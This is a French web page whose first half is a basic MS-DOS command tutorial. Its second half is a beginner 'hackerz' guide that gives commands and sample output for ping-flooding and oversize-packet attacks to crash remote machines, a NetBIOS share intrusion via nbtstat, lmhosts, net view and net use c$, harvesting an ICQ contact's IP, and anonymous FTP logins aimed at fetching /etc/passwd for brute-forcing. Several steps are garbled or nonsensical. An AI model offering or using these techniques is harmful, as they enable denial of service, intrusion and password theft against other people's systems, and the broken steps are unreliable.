<%@ Language=JavaScript %> Commande DOS

Les bases de MS-DOS - Page 1 de 2

La commande la plus utilisée du DOS est la commande DIR. Elle permet d'afficher à l'écran la liste des fichiers d'un disque.
Pour voir une liste de fichier, tapez DIR à la suite de l'indicatif du DOS puis appuyez sur Entrée.
C:\>DIR
Pour que l'ordinateur fasse une pause pendant le défilement de la liste tapez : C:\>DIR / P
Pour avoir seulement une liste des noms des fichiers triés en colonne, tapez : C:\>DIR / W
Pour voir les fichiers d'une disquette, faites suivre DIR par le nom du lecteur : C:\>DIR A:
Utilisez le joker pour chercher des fichiers précis : Le joker * sert à masquer un groupe de caractère dans un fichier. Par exemple pour trouver tous les fichier commençant par n, tapez : DIR N*

La commande à utiliser pour voir ce que contient un fichier s'appelle TYPE. C:\>TYPE NOMFICH.EXT
Par exemple pour voire le contenu du fichier lisez.moi tapez
C:\>TYPE LISEZ.MOI
Suivi de la touche Entrée.
Pour faire une pause entre chaque écran, tapez :
C:\>TYPE LISEZ.MOI | MORE
(la barre verticale s'obtient par la combinaison [ALT]+[6].

Pour passer à un autre répertoire du disque, il faut utiliser la commande CD suivie du nom du répertoire.
C:\>CD WINDOWS
Pour passer dans la racine du disque, tapez
C:\>CD \
Pour revenir au répertoire précédent, tapez CD..
C:\>CD..

Pour rappeler la dernière commande tapée, appuyez sur la touche F3

La commande COPY sert à copier un fichier
Elle s'utilise de cette façon :
C:\>COPY source destination
Par exemple pour copier le fichier autoexec.bat dans le répertoire WINDOWS, tapez :
C:\>COPY AUTOEXEC.BAT C:\WINDOWS
On peut se servir du joker pour copier plusieurs fichiers en même temps.
Voir La commande DIR.

Pour supprimer un fichier, il faut utiliser la commande DEL
C:\>DEL source
Par exemple pour supprimer tous les fichiers commençant par un A, tapez :
C:\>DEL A*
Faites attention à ne pas supprimer n'importe quels fichiers!

 

Les bases de MS-DOS - Page 2 de 2

La commande REN du Dos vous permet de renommer un fichier. Le contenu et la position du fichier sur le disque ne change pas : seul son nom change.
Pour renommer le fichier AAAAA.doc en BBBBB.doc, il faut taper :
C:\>REN AAAA.doc BBBB.doc
Il faut mettre le nom actuel, suivi d'un espace et du nom futur.
Si le fichier ne se trouve pas dans le répertoire courant, il suffit de taper son chemin d'accès.
Par exemple si le fichier AAAA.doc se situe dans le répertoire C:\WORD, il faut tapez :
C:\>REN C:\WORD\AAAA.doc BBBB.doc
Vous pouvez utiliser le Joker pour renommer plusieurs fichiers en même temps.
(Cf La commande DIR)

Pour formater un disquette, il faut utiliser la commande FORMAT
Pour formater le disque A: tapez :
C:\>FORMAT A:
Pour effectuer un formatage rapide tapez :
C:\>FORMAT A:/Q
Pour faire une disquette système, tapez :
C:\>FORMAT A:/S
Vous pouvez combiner les deux: si vous voulez créer une disquette système rapidement, tapez :
C:\>FORMAT A: /Q /S

La commande DISKCOPY permet de dupliquer des disquettes. Vous ne pouvez pas utiliser DISKCOPY pour dupliquer deux disque de capacité différentes.
Vous ne pouvez pas utiliser DISKCOPY avec un disque dur.
Il suffit de taper ( si vous lecteur de disquette est A) :
C:\>DISKCOPY A: A:
Après avoir chargé la première disquette, l'ordinateur vous demande d'inserer la disquette destination.

Pour éditer un fichier quelconque, utilisez la commande EDIT. Pour cela tapez :
C:\>EDIT chemin\nomdufichier
Vous obtiendrez alors l'éditeur du Dos :

                                                                                      

 


Pour éditer le fichier AAAA.doc du répertoire C:\WORD, tapez :
C:\>EDIT C:\WORD\AAAA.doc

CD : Cette commande permet de changer de répertoires.

CLS : Cette commande très utiles efface l'écran, en retirant tous les messages encombrants.

COPY : Cette commande permet de copier un fichier.

DEL : Cette commande permet de supprimer des fichiers.

DIR : Cette commande affiche la liste des fichiers et des répertoires présent sur le disque.

DISKCOPY : Cette commande crée une copie exacte d'une disquette

FORMAT : Cette commande permet de formater des disques.

MD : Cette commande permet de créer des répertoires.

REN : Cette commande permet de renommer un fichier.

TIME : Cette commande affiche la date et l'heure et vous permet de les modifier.

TYPE : Cette commande affiche le contenu d'un fichier à l'écran.

N'utilisez jamais les commandes du DOS suivantes :

CTTY : Cette commande déconnecte le DOS du clavier et de l'écran.

DEBUG : Il s'agit d'un utilitaire permettant de créer des programmes et de modifier la mémoire. Une mauvaise utilisation peut entraîner le chamboulement de votre disque dur.

FDISK : Cette commande permet de créer des partitions . Mal utilisée, cette commande peut détruire toutes les informations de votre disque dur.

FORMAT C: : Cette commande formate votre disque dur, ne l'utilisez pas à moins d'être sur de ce que vous faites.

RECOVER : Contrairement à ce qu'on pourrait croire, cette commande n'est pas un sauveteur. Cette commande détruit tous les fichiers et tous les répertoires de votre disque, et cela, sans de demande de confirmation.

                                 ==============================================================================================

Et oui même de simples commandes DOS peuvent se révéler utiles aux hackerz !

Attention tout piratage ou intrusion quelconque dans un système est puni par la loi

Le DOS est une mine d'or pour les djeunz hackerZ… voilà enfin un article pour les newbies de chez newbies :)
Voici les principales commandes utiles aux attaques par DOS (à ne pas confondre avec l'attaque DoS : DenialofService qui est un plantage de l'OS distant) avec exemples et schémas à l'appui :

Le Ping :
Nom de la commande : ping

· Le ping sert à convertir le nom d'hôte ou l'url d'un site en ip, à obtenir des infos sur un serveur
désiré (souvent voire toujours utile et indispensable avant un test de vulnérabilité) et à tester le temps de réponse d'un serveur.

Exemple : C:WINDOWS>ping www.securent-2000.com

Envoi d'une requête 'ping' sur www.securent-2000.com [217.174.192.67] avec 32 octets de données :

Réponse de 217.174.192.67 : octets=32 temps=142 ms TTL=240
Réponse de 217.174.192.67 : octets=32 temps=141 ms TTL=240
Réponse de 217.174.192.67 : octets=32 temps=139 ms TTL=240
Réponse de 217.174.192.67 : octets=32 temps=144 ms TTL=240

Statistiques Ping pour 217.174.192.67 :
Paquets : envoyés = 4, reçus = 4, perdus = 0 (perte 0%),
Durée approximative des boucles en milli - secondes :
minimum = 139ms, maximum = 144ms, moyenne = 141ms

· La commande 'ping' a une autre fonction : le ping overflood (ou flood ping). Cette fonction du ping
sert à rebooter une machine distante.
La commande à entrer est : ping -n nbr_de_packets ip.de.la.cible

Exemple : C:WINDOWS>ping -n 65000 172.190.176.24 // j'ai mis 65000 mais faut en mettre suffisamment pour faire rebooter la machine attaquante (ou la votre ! car il est strictement interdit de faire justice sois même ;)

Envoi d'une requête 'ping' 172.190.176.24 avec 32 octets de données
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
[…]
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128 //J'ai raccourci de quelques milliers de lignes…

Statistiques Ping pour 172.190.176.24 :
Paquets : envoyés = 45631, reçus = 12563, perdus = 33098 […]

Pour arrêter le flood faites Ctrl+C

· Et dernière fonction utile pour nous : l'oversize packet.
La commande à entrer est : ping -l taille dans taille rentrer la taille du paquet à envoyer comprise entre 0 et 65000 (la plus grosse possible bien sur ;)

Exemple : C:WINDOWS>ping -l 64510 www.lesite.com

Heureusement, presque tous les serveurs sont protégés et vous recevrez une message de timeout comme quoi le délai d'attente autorisé est dépassé…


Net view :
Nom de commande : net view nom_d'ordi
La commande net view sert à voir les ressources partagées d'un ordi avant une attaque NetBIOS (voir plus loin)

Exemple : C:WINDOWS>net view G4S9F2

Net use :
Nom de commande : net use om_d'ordilettre_de_partition
La commande net use sert à se connecter au répertoire d'une ressource partagé sans pass. Son utilité la plus fréquente est dans les attaques NetBIOS pour se connecter au répertoire windows en mettant c$ à la place de la lettre de la partition (voir plus loin).

Exemple : C:WINDOWS>net use G4S9F2d


Le statistic NetBIOS over TCP/IP :
Nom de commande : nbtstat
L'attaque par NetBios est une intrusion en règle qui sert à rentrer dans un ordi qui a des fichiers partagés (c'est un exploit NetBIOS quoi).
La commande à entrer est : nbtstat -A ip.du.pigeon

Exemple : C:WINDOWS>nbtstat -A 172.188.66.214

 

NetBIOS Remote Machine Name Table

Name

Type

Status

G4S9F

WORKGROUP

G4S9F2

 

<20>

<00>

<03>

 

UNIQUE Registred

GROUP Registred

UNIQUE Registred

 

MAC Adress = 44 - 45 - 53 - 54 - 00 - 00

La ligne " G4S9F2 <20> UNIQUE Registered" nous intéresse car elle possède le nom d'ordi (G4S9F2) et la valeur <20> qui veut dire que l'hôte possède des fichiers partagés et donc que l'attaque va être possible.

Il faut maintenant modifier le DOS en entrant la ligne edit lmhost pour entrer dans l'éditeur de DOS puis taper les commandes :

Ip.de.la.cible nom_de_l'ordi #PRE

Donc pour l'exemple de mon ordi :

172.188.66.214 G4S9F2 #PRE

Faites Fichier>Enregistrer puis Fichiers>Quitter pour revenir au DOS.
Tapez ensuite la commande : nbtstat -R
Vous obtenez alors : Successfull purge and preload of the NBT Remote Cache Name Table puis l'inventaire des ressources partagées (a,c,d…).
Entrez alors la commande : net view om_d'ordi

Donc pour notre exemple :C:WINDOWS>net view G4S9F2

Vous obtenez alors l'inventaire des ressources partagées (a,c,d,e…)
Entrez ensuite : net use om_d'ordiX X étant la lettre de partition à laquelle on veut accéder
Puis pour accéder au répertoire windows (qui donnera donc accès au disque dur distant), remplacez le X par c$
Ca y est j'ai pris le contrôle de mon ordi :)


Les connexions actives :
Nom de commande : netstat -n
La commande Netstat sert à voir toutes connexions actives vers votre ordi sous la forme :

Proto Adresse locale Adresse distante Etat

Mais l'utilité pour nous va donc être de trouver une ip sur icq. Ben ouais le mec avec qui vous parlez est en connexion active avec l'icq de votre ordi.
Pour choper l'ip de votre pote sur icq faut d'abord qu'il soit connecté à icq (logique). Bon quand vous voyez votre pote connecté à icq, éteignez votre icq et entrez (dans le DOS) la commande : netstat -n puis rallumez 1 min après votre icq et envoyez un message à votre pote. Ensuite y a plus qu'à refaire netstat -n et une ip à du apparaître avec un port du genre 5190 ou 5191 (y en a plein mais c'est les plus courants). Son ip apparaîtra dans la partie Adresse distante sous la forme 172.183.68.46 : 5190 (décidément ces zaoliens y sont partout). Cette méthode ne marche plus depuis un bout de temps mais c'est une techniques qui était utilisée, donc à voir.


Le protocole FTP :

Nom de commande utile : ftp -n et plein d'autres.
Voyons comment hacker par FTP. Mais ne vous faites pas d'illusions cette technique ne marche à peu près que sur 1 serveur sur 100 000 (et encore). Mais qui sait peut être que si vous avez déjà gagné au loto… vous trouverez un serveur non sécurisé. De toute façon nous c'est la technique qu'on veut c'est pas les pratiques illégales qu'on peut faire avec :)
Pour hacker un site par FTP, nous allons ouvrir l'url concerné, puis passer le login… sans login, puis passer le pass… sans pass.

Exemple :C:WINDOWS>ftp -n
ftp> open www.securent-2000.com //arf… de toute façon ça marche pas
Connecté à www.securent-2000.com.
220 www.securent-2000.com FTP server ready.
ftp> quote user ftp //entrer quote user ftp
331 Guest login ok, send your complete e-mail address as password.
ftp> quote cwd ~root //entrer quote cwd ~root
530 Please login with user and pass.
ftp> quote pass ftp //entrer quote pass ftp
230 Guest login ok, access restriction apply
ftp>

Le problème c'est que vous serez loggé sur le site mais pas en tant que root donc vous n'aurez pas toutes les possibilités. Pour être loggé en tant que root remplacez au début : ftp> open www.securent-2000.com par ftp> open &quot ;open www.securent-2000.com&quot; mais la faut plus de chance qu'au loto !

Bon maintenant que vous êtes loggé sur le site (en tant que root ou non) voyons les commandes ftp qui vont nous permettre de modifier le site.

kdir : créer un répertoire
rmdir : supprimer un répertoire
pwd : se repérer sur le disque
cd : aller dans un répertoire
dir : voir le contenue de la racine ou du répertoire ou l'on se trouve. Pour différencier un fichier d'un répertoire, regardez le premier caractère qui est soir une lettre (répertoire) soir [-] (fichier).
cd / : revenir à la racine du répertoire
cd .. : revenir au répertoire précédent
del : supprimer un fichier
get : prendre un fichier pour le mettre sur le bureau
put : mettre un fichier de votre bureau sur le serveur
ascii : passe la connexion en mode ascii
binary : passe la connexion en mode binaire
system : trouver la version du daemon et le type d'OS sous lequel tourne le serveur
open : établir une connexion avec un serveur distant
quit : se déconnecter du serveur distant

Entrez les commandes comme ça : ftp>get pass.txt //c'est seulement un exemple !

Cherchons maintenant le pass du root pour obtenir tous les pouvoirs (sauf si vous avez déjà gagné 3 ou 4 fois le pactole). Le fichier contenant les pass se nomme généralement " passwd " et se situe dans le rép /etc/passwd. S'il n'y est pas cherchez mais il est toujours facilement accessible. Quand vous avez obtenue le fichier de pass il suffit de le décrypter avec un brute force mais si il est shadow y a plus qu'a vérifier l'OS utilisé par le serveur pour utiliser le bon password cracker.

oceanic64